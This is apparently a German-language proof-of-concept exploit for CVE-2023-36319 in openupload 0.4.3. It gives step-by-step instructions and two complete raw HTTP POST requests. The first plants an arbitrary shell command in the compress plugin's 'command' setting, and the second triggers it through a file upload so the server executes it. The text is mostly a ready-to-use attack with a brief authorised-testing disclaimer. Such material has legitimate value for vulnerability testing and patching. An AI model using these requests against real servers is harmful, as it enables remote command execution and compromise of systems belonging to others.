
exp4CVE-2023-36319
Durch die Modifizierung des Komprimierungs-Plug-in-Befehls kann der Angreifer den Server dazu veranlassen, während des Upload-Vorgangs beliebige Befehle auszuführen.
Nur für autorisierte Sicherheitstests verwenden, bitte nicht für illegale Zwecke nutzen. Verstöße haben nichts mit dem Autor zu tun.
openupload Stabile Version 0.4.3
Melden Sie sich im Backend an und klicken Sie auf die Funktion: Administration ->Plugins ->compress
Fügen Sie eine neue „command“-Direktive hinzu und speichern Sie:
POST /index.php HTTP/1.1
Host: www.test.com
Content-Length: 183
Cache-Control: max-age=0
Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
action=adminpluginsoptions&step=4&id=compress&gid=admins&command=<YOUR CMD>&extension=&compression=
Rufen Sie die Funktion „File upload“ auf, laden Sie eine beliebige Datei hoch und stellen Sie sicher, dass „compress=0“ in den Parametern steht.
POST /index.php HTTP/1.1
Host: www.test.com
Content-Length: 53
Cache-Control: max-age=0
Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
action=u&step=3&description=123&emailme=no&compress=0
Die von uns geschriebenen Befehle werden normal ausgeführt.